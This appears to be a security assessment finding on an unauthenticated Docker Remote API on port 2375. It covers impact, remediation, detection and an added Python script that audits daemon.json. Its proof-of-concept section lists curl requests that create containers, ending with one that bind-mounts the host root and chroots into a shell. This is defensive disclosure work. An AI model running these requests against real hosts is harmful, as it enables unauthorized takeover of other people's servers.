Open Docker API Port Without TLS

Quick Summary

Open Docker API Port Without TLS is a critical misconfiguration where the Docker Remote API is exposed over TCP (commonly port 2375) without TLS encryption or authentication. This allows unauthenticated users to directly interact with the Docker daemon, potentially resulting in container manipulation, data exfiltration, or full host compromise.

Vulnerability Classification

  • Vulnerability Type: Insecure Remote Management Interface
  • CWE ID: CWE-306 – Missing Authentication for Critical Function
  • CVE ID: N/A (Configuration Issue)
  • CVSS 4.0 Base Score: 9.6 (Critical)
  • CVSS Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H
  • OWASP Category: A05:2021 – Security Misconfiguration
  • Attack Surface: External / Internal Network

Affected Asset / Environment

  • Service: Docker Remote API
  • Common Ports: 2375 (Non-TLS), 2376 (TLS)
  • Platforms: Linux Servers, Cloud Instances, Container Hosts
  • Testing Method: Black-box / External Assessment
  • Tools Used: Nmap, curl, Docker CLI

Description

The assessor observed that the Docker daemon is listening on TCP port 2375 without TLS protection. The Docker Remote API allows administrative control over containers, images, volumes, and networks.

When exposed without TLS or authentication, attackers can directly communicate with the Docker daemon using HTTP requests. Since Docker typically runs with elevated privileges, this misconfiguration may lead to complete host compromise.

Publicly exposed Docker APIs have been widely abused to deploy cryptocurrency miners, malicious containers, and persistent backdoors.

Root Cause

The issue occurs due to insecure Docker daemon configuration.

Common root causes include:

  • Docker daemon started with -H tcp://0.0.0.0:2375
  • TLS not configured for remote API
  • Missing firewall restrictions
  • Misconfigured cloud security groups
  • Lack of secure container host hardening

Business Impact

Exploitation of this vulnerability may allow attackers to deploy unauthorized containers, access sensitive application data, or mount host directories. This may result in full server takeover, data theft, or service disruption.

In production environments, compromise of the container host may affect multiple applications and services, leading to operational downtime and financial loss.

Technical Impact

An attacker can:

  • Query Docker version and configuration
  • List running containers
  • Pull malicious images
  • Create privileged containers
  • Mount host file system
  • Execute arbitrary commands on host

This exposure provides direct administrative control over the container host.

Proof of Concept (PoC)

Step 1: Identify Open Docker API Port

nmap -sV -p 2375,2376 <target-ip>

If port 2375 is open and identified as Docker, proceed to validation.

Step 2: Retrieve Docker Version Information

curl http://<target-ip>:2375/version

If version details are returned without authentication, the API is exposed.

Step 3: List Running Containers

curl http://<target-ip>:2375/containers/json

If container details are displayed, unauthorized API access is confirmed.

Step 4: Create a Test Container (Authorized Testing Only)

curl -X POST http://<target-ip>:2375/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["id"]}'

If container creation succeeds without authentication, the system is critically exposed.

Step 5: Mount Host File System (Authorized Testing Only)

curl -X POST http://<target-ip>:2375/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["chroot","/host","/bin/sh"],"HostConfig":{"Binds":["/:/host"]}}'

Successful execution confirms potential host-level compromise.

Exploitation Prerequisites

  • Network access to port 2375
  • Docker daemon running
  • No TLS configured
  • No authentication enforcement
  • Firewall not restricting access

Remediation

It is recommended that the Docker Remote API not be exposed without TLS and access controls.

Recommended actions:

  • Disable remote API if not required
  • Configure TLS with client-certificate authentication (port 2376)
  • Bind Docker daemon to localhost
  • Restrict access via firewall rules
  • Implement role-based access control
  • Regularly audit container host configurations

After implementing controls, validate that unauthenticated access is blocked.
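As an added example that is not part of the original finding, the following Python script audits a daemon.json document for the weak setting described above (a TCP listener without client-certificate verification) and shows it beside a corrected configuration. Both sample configurations, including the address 10.0.0.5 and the certificate paths, are constructed for illustration; the keys used (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are the real daemon.json options.

```python
import json
from urllib.parse import urlsplit

# Constructed sample daemon.json documents (not from any real host):
# the weak setting that produces the finding above, and a corrected one.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_daemon_config(raw: str) -> list[str]:
    """Return findings for a daemon.json document; an empty list means no
    network-reachable listener without client-certificate authentication."""
    cfg = json.loads(raw)
    findings = []
    tls_verify = bool(cfg.get("tlsverify", False))  # server verifies client certs
    tls_only = bool(cfg.get("tls", False))          # encryption only, no client auth
    has_certs = all(k in cfg for k in ("tlscacert", "tlscert", "tlskey"))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are not reachable over the network
        parts = urlsplit(host)
        addr = parts.hostname or "0.0.0.0"  # "tcp://:2375" means all interfaces
        if addr in LOOPBACK:
            continue  # reachable only from the host itself
        if not tls_verify:
            if tls_only:
                findings.append(f"{host}: tls without tlsverify, clients are not authenticated")
            else:
                findings.append(f"{host}: plaintext TCP listener, unauthenticated remote API")
        elif not has_certs:
            findings.append(f"{host}: tlsverify set but tlscacert/tlscert/tlskey are missing")
        if parts.port == 2375:
            findings.append(f"{host}: conventional non-TLS port 2375; move to 2376 with TLS")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(doc) or ["no findings"])
```

The script only reads daemon.json; a -H tcp://0.0.0.0:2375 flag passed on the dockerd command line (for example in a systemd unit) would not be seen, so check the unit file or the running process arguments as well.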

Detection and Monitoring

  • Monitor traffic to ports 2375 and 2376
  • Alert on external API requests
  • Review Docker daemon logs
  • Conduct periodic external exposure scans
